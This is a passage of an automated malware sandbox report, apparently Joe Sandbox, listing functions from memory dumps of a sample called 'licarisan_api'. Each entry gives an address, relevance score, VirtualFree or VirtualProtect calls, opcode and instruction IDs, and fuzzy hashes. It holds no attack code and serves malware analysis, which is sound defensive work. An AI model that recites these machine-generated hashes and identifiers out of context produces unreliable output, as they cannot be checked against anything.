                                    • Instruction Fuzzy Hash: 9C31B0B2F00618ABEB748A15DC49FBAB779EBC5310F1042E9E50D67680DA786EC18F51
                                    Function 007AC25E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: d853f152399a1d6ab5e6935ae24fff43d46c68606aaa3d3cfce9963f27704065
                                    • Instruction ID: 5c1bb31c19edeb2de70688b436b83d4af1949d83d99e26a9fd476d7411c3e83c
                                    • Opcode Fuzzy Hash: d853f152399a1d6ab5e6935ae24fff43d46c68606aaa3d3cfce9963f27704065
                                    • Instruction Fuzzy Hash: A431A571E00318ABEB358A54DC84BEAB774FB8A711F2042E9E54DA7280C6786EC08F51
                                    Function 007AC4A1 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 475820cc6636f0ff1001a395c9c2a7c42a251b9f9c81458939018e2a97672b10
                                    • Instruction ID: 08351f75eebc97045d37530b15d25696c93444c5751458ef337618ac3b00b6d4
                                    • Opcode Fuzzy Hash: 475820cc6636f0ff1001a395c9c2a7c42a251b9f9c81458939018e2a97672b10
                                    • Instruction Fuzzy Hash: CB31B671E00318ABEB258A24DC44BEAB774FB89711F2042E9E50DA7280C6786EC18F51
                                    Function 007ABCC6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: b7889ebaad0b84ab2512a546ea8b73d52d05d9ddc356231a7c2b9b4f5c531176
                                    • Instruction ID: fd368957637398418a63bbebded74b8489599faa443560514f60ddb93cddf9d6
                                    • Opcode Fuzzy Hash: b7889ebaad0b84ab2512a546ea8b73d52d05d9ddc356231a7c2b9b4f5c531176
                                    • Instruction Fuzzy Hash: 9731E1B2F00214ABF7348A15DC48BAB7778EBC5320F1042F9F50D66680DA796EC18E51
                                    Function 007AC14F Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 398c79ac294e8a3224d671425b208c8b4c5ebefb929975ec32630353bfe39967
                                    • Instruction ID: 0b453bd5cd81547a118089a6ab5fea09c6808439c2be87a92644c10e12237b0c
                                    • Opcode Fuzzy Hash: 398c79ac294e8a3224d671425b208c8b4c5ebefb929975ec32630353bfe39967
                                    • Instruction Fuzzy Hash: 7431C5B2F00718ABFB358A55DC45BBBB778EB85320F1042E9E50DA6680D67C9EC08F51
                                    Function 007AC2C7 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 9cb92442304782f198ce376fce12b9f74f1960ad33c9f37e40c51f26fbdab747
                                    • Instruction ID: 49e8c4e35e17b3fa1aecfa57351cd35bbf500a1fe81d78d967845060d2555a92
                                    • Opcode Fuzzy Hash: 9cb92442304782f198ce376fce12b9f74f1960ad33c9f37e40c51f26fbdab747
                                    • Instruction Fuzzy Hash: 15318771E00318ABEB358B64DC44BBAB774FB89711F2042E9E50DA6680C6796EC08F51
                                    Function 007AC149 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: d6cac45f500da1d56d63cbf2d839432a4a5da025848ac7e8b1256f246f1a7191
                                    • Instruction ID: 63b1b9b06afb06cd5ee5260544c30912e92577c5e0f0febf079715e0609ed778
                                    • Opcode Fuzzy Hash: d6cac45f500da1d56d63cbf2d839432a4a5da025848ac7e8b1256f246f1a7191
                                    • Instruction Fuzzy Hash: 2C31B4B2F40718ABFB358A55DC45BBBB778EB85320F1042E9E50DA6680D67C9EC08F51
                                    Function 007AC528 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 4d87bb2950da209f0fbedaaf8dc1c682a82597ed12581661aa93e1bf8978dd75
                                    • Instruction ID: a26ddbe78309eab30d06003ad0f8eb69989fdf6daa673dddf69ea97d50e4abfc
                                    • Opcode Fuzzy Hash: 4d87bb2950da209f0fbedaaf8dc1c682a82597ed12581661aa93e1bf8978dd75
                                    • Instruction Fuzzy Hash: 46318471F00718ABEB25CE64DC44BAAB775FB89711F2042E9E54DA7280C678AEC08F11
                                    Function 007AC171 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: e465aa12786ff38937b8fed913bafcc6839dd581aafb3daf37a06a4d29d41662
                                    • Instruction ID: b166cb2ffe15f8ad6a937773f26d85b0c5844129973a17ad315fa631618e6d3f
                                    • Opcode Fuzzy Hash: e465aa12786ff38937b8fed913bafcc6839dd581aafb3daf37a06a4d29d41662
                                    • Instruction Fuzzy Hash: 5721EAB2F00714ABFB348A54DC45FAAB778FB85310F1042E9E50D96680DA789FC08F11
                                    Function 007ABD61 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: b0fa45d5876e463ad580025d175e10e510d257f028c0db719f2114d4873bf3dc
                                    • Instruction ID: 4ef7c829929a912d9c6e65b86d4828468d48d10e41dc8bf079e46500cb888f9f
                                    • Opcode Fuzzy Hash: b0fa45d5876e463ad580025d175e10e510d257f028c0db719f2114d4873bf3dc
                                    • Instruction Fuzzy Hash: C621D1B2F00314ABF7748A64DC49BBAB778EBC5310F1042E9F50D6A680DA795EC18F11
                                    Function 007AC565 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 77COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: a015c9269c0f9357aab274a3c6c81782fd82b2ef031a25794c6bfa0c0237fd05
                                    • Instruction ID: 6a9473efeaa6b0cac19ea484c4a92f477a771782623b5dbc20003d226d1cd362
                                    • Opcode Fuzzy Hash: a015c9269c0f9357aab274a3c6c81782fd82b2ef031a25794c6bfa0c0237fd05
                                    • Instruction Fuzzy Hash: 2D21A675F01718ABEB35CE60DC48BB9B7B4FB8A711F1042E9E54DA6280C6789EC18F01
                                    Function 007AC580 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 5d8526589c0a7cd1354d38865a31cbe857800af0b33557c2e661810eacc8e49e
                                    • Instruction ID: f6c825e70d39b73242e403de618c3362b61a147f951c19a4e6d44e4e80ef319f
                                    • Opcode Fuzzy Hash: 5d8526589c0a7cd1354d38865a31cbe857800af0b33557c2e661810eacc8e49e
                                    • Instruction Fuzzy Hash: ED213075F01718ABEB35CA60DC48BA9B7B5FB89711F1042D9E54DA6680CA785EC08F11
                                    Function 007AC586 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 78f3dfdaee8065cce4dc377755ff394c4dd9ac3523d471fa5a4f735ab731ecb2
                                    • Instruction ID: bfbb113cd2422790bbffa36b93560f5b984fea63a4c09141054c300f30f68182
                                    • Opcode Fuzzy Hash: 78f3dfdaee8065cce4dc377755ff394c4dd9ac3523d471fa5a4f735ab731ecb2
                                    • Instruction Fuzzy Hash: 4C215171F01728ABEB35CA50DC44BAAB775FB89711F1042D9E54DA7280C6789EC0CF40
                                    Function 007AC86B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 2905a1b3d16c9afd206afd1153e24ad67516d8cffc638537b4985609b6f4b83c
                                    • Instruction ID: a8af6e6bf767e241e4f40725efb20ffc2da44ad8dccb993f268b9740d76714fa
                                    • Opcode Fuzzy Hash: 2905a1b3d16c9afd206afd1153e24ad67516d8cffc638537b4985609b6f4b83c
                                    • Instruction Fuzzy Hash: E6115E76F01718ABEB75CA51DC44BAAB7B9BBC9711F1042D9E50DA6680CA789EC08F01
                                    Function 007AC632 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 19a635d113a889bca145703eea937c5f941f0b0294e54e31b88c8b81cb096b1d
                                    • Instruction ID: 9dafd8aab2f3cd08ddf668af48ac0107ec79b53f75657b89b090be6e50d859a8
                                    • Opcode Fuzzy Hash: 19a635d113a889bca145703eea937c5f941f0b0294e54e31b88c8b81cb096b1d
                                    • Instruction Fuzzy Hash: FE115175F01718ABEB75CA51DC44BAAB779BBC9711F1042D9E50DA6680CA749EC08F01
                                    Function 007AC60D Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: f9cd534e2d79336848db7c2bd752ae2309d7de300c3ea0983c99940856add9dc
                                    • Instruction ID: 052167ba2bdd6170348e2ba9594debb504a105eabe40accdae341188188b83f9
                                    • Opcode Fuzzy Hash: f9cd534e2d79336848db7c2bd752ae2309d7de300c3ea0983c99940856add9dc
                                    • Instruction Fuzzy Hash: 4F118171F01718ABEB75CA60DC44BAAB7B9BBC9711F1042D9E50DA6680CA749EC08F01
                                    Function 007AC5DB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: a5d1341fad287f58e2e9133a19f59c78098befd68d0ede081d43d3dd70189b22
                                    • Instruction ID: 97124aaa41c717216592375e5207dce16a6eda4ff73cc6bb7ac53e14231e09de
                                    • Opcode Fuzzy Hash: a5d1341fad287f58e2e9133a19f59c78098befd68d0ede081d43d3dd70189b22
                                    • Instruction Fuzzy Hash: 21115E76F01718ABEB75CA61DC44BAAB779BBC9711F1042D9E50DA6680CA789EC0CF01
                                    Function 007A59C9 Relevance: 1.7, APIs: 1, Instructions: 203memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: c8dd0b6c53d9b6222e82cc26891b966b17b7330245c299591a17c20adc1dd87b
                                    • Instruction ID: 02e91c3cfac89311b4379ea70181820f232e1ec225e3f0482b65af0b793324bd
                                    • Opcode Fuzzy Hash: c8dd0b6c53d9b6222e82cc26891b966b17b7330245c299591a17c20adc1dd87b
                                    • Instruction Fuzzy Hash: 4471D2B2D005259BE7248A15DC94BEFBB79EF91310F0481FAD90DA7780EA385EC58F91
                                    Function 007C88BF Relevance: 1.7, APIs: 1, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 9f8c703c4156bc9f4bb532e3141dcc47fc2f07e4646ef20af98183b881b1bb8d
                                    • Instruction ID: b0345f813f17c64d8cea8ce49bd2acbcbfdd0ec870eddd6e3baac2363402e8e2
                                    • Opcode Fuzzy Hash: 9f8c703c4156bc9f4bb532e3141dcc47fc2f07e4646ef20af98183b881b1bb8d
                                    • Instruction Fuzzy Hash: 7B617EB1D10518CEE7648B24DC94BFAB775EF84311F1081EEE44EAA280EB785EC18F12
                                    Function 007B22DE Relevance: 1.7, APIs: 1, Instructions: 160memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ad434f6df366d6c9cf0fd054b42e6d77afbf65798a24849a36d1749fee213910
                                    • Instruction ID: 353ab274c7d1fea26b73f30d1f180f7c165c88e8b46210226cb80cec77c69ecc
                                    • Opcode Fuzzy Hash: ad434f6df366d6c9cf0fd054b42e6d77afbf65798a24849a36d1749fee213910
                                    • Instruction Fuzzy Hash: 9F51ACB2D052249FEB248B20DC95BEAB778FF84310F1480FAD90DA6241E6385EC6CF51
                                    Function 0080F671 Relevance: 1.7, APIs: 1, Instructions: 157memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: e7b64420a3be651803fc0fe9a5d57c4794f0ebef67198fcf90193ce5f72ca664
                                    • Instruction ID: fc9c3b23f3e8f67da1e20ebbb86b60c54c6828f55b2d5551a86d7837ff3a9242
                                    • Opcode Fuzzy Hash: e7b64420a3be651803fc0fe9a5d57c4794f0ebef67198fcf90193ce5f72ca664
                                    • Instruction Fuzzy Hash: 0A5108B2D141199FF7388A14DC49BF77778FB80310F0481BAEA0D96A80D7799EC58E52
                                    Function 007C8A6D Relevance: 1.7, APIs: 1, Instructions: 155memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0434fc00d4c3dc9e18791e0c1b8e30a9d0244ad0384565363a66a68edece5372
                                    • Instruction ID: 206f9cca499ef5433ac11dcb101cc10545eb3243dd002342f3a7d8a351cef9af
                                    • Opcode Fuzzy Hash: 0434fc00d4c3dc9e18791e0c1b8e30a9d0244ad0384565363a66a68edece5372
                                    • Instruction Fuzzy Hash: 9D51CDB09045688FDB64CB04CDD4FBABBB5EB80306F2481EED50E57241DA386FC58E26
                                    Function 007B2767 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b6387210e7f0cfb8f6de4e36e58e9e7683be7cc545106e1147aae8e9970cfab
                                    • Instruction ID: 6ef80f21dcee6f5fb57697ac6c184278c682d0a70f544875010aa0b7c9177f78
                                    • Opcode Fuzzy Hash: 3b6387210e7f0cfb8f6de4e36e58e9e7683be7cc545106e1147aae8e9970cfab
                                    • Instruction Fuzzy Hash: 8F4104B1D1A1A49FDB15CB20DCA4BFE7B75FF52301F1840EAE909A6242DA385D81CF51
                                    Function 007B2268 Relevance: 1.6, APIs: 1, Instructions: 118memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ecaa575ad9236170442c1d82988b8e03394a72be6ed3739858042195aca261b0
                                    • Instruction ID: a8dde98f03c5aa08eea774b5320f973568674d428e17518e8bb503aa11cbf898
                                    • Opcode Fuzzy Hash: ecaa575ad9236170442c1d82988b8e03394a72be6ed3739858042195aca261b0
                                    • Instruction Fuzzy Hash: 814103F2E012149FF7248A10DC54BFA77B9EB95320F0580FAE90D5A281DA7C5EC68F61
                                    Function 007A56ED Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: a5d39b1de060fcc8601f9feac4495f7dbde5f6668826a979d2e7a596a429ac4e
                                    • Instruction ID: 0ee9f385ac1fa788bfd32363b3610a369cf3756cf8e606afcf1a92adf0ea56f6
                                    • Opcode Fuzzy Hash: a5d39b1de060fcc8601f9feac4495f7dbde5f6668826a979d2e7a596a429ac4e
                                    • Instruction Fuzzy Hash: BF41D0F2D00A589FF724CA10CC94BAA7774FB95311F0486FAD94AA6680D63C9EC08F11
                                    Function 007A56F7 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 05e87b8b3d4588bd2b1d1de5ce07ac3371002d4ec72ba5477750a4a0d12bb5e5
                                    • Instruction ID: 7167522e3fe4a160b6c3c09458a6b18b01fb174c4860fb58508a97ddeef07b6d
                                    • Opcode Fuzzy Hash: 05e87b8b3d4588bd2b1d1de5ce07ac3371002d4ec72ba5477750a4a0d12bb5e5
                                    • Instruction Fuzzy Hash: AC41C0F2D15A589FF724CB10CC94BAA77B4FB95311F0482FAD549A6680D63C9EC08F51
                                    Function 007B24D3 Relevance: 1.6, APIs: 1, Instructions: 110memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 599c1df4128e2fba964b58db531353ad8285fe9d6785be8edd3a08f36825a796
                                    • Instruction ID: e8af84202d0c8d7fd09c0b0e00196f797ecc1a61b29839c8d8e077c038c9ec33
                                    • Opcode Fuzzy Hash: 599c1df4128e2fba964b58db531353ad8285fe9d6785be8edd3a08f36825a796
                                    • Instruction Fuzzy Hash: 8D41A0B2E012249FE7248A00DC51BEA77B9EB95320F1480FAE90DA6281D77C5EC58F61
                                    Function 007BD010 Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 66424fdcc782847726124720a66ca98fbc7a3384bf4b4d53f18b914e0f5ac7df
                                    • Instruction ID: 4dcb39081cca200b1ebf624b2cb7bf6101951205901d6d126ba059d93e59999d
                                    • Opcode Fuzzy Hash: 66424fdcc782847726124720a66ca98fbc7a3384bf4b4d53f18b914e0f5ac7df
                                    • Instruction Fuzzy Hash: C541F8B1D090589BEB35CA28DC94BFE7775EF90311F2480BAD80996241E63D9E86CF01
                                    Function 007A5908 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 4136d8c54e83034037582a6c399c6a47f1873b3f38930330b9d7cf2ec25dd61d
                                    • Instruction ID: bd01197b6df1f68d7a4cf6ab33f84bb2df75cea0f76b3bca6dee24a3d9d59003
                                    • Opcode Fuzzy Hash: 4136d8c54e83034037582a6c399c6a47f1873b3f38930330b9d7cf2ec25dd61d
                                    • Instruction Fuzzy Hash: 463190F2D04A199FF7148A14DC95BFA7778EB91311F0482FAD54E96680E63C9EC08F51
                                    Function 007A5955 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Memory Dump Source
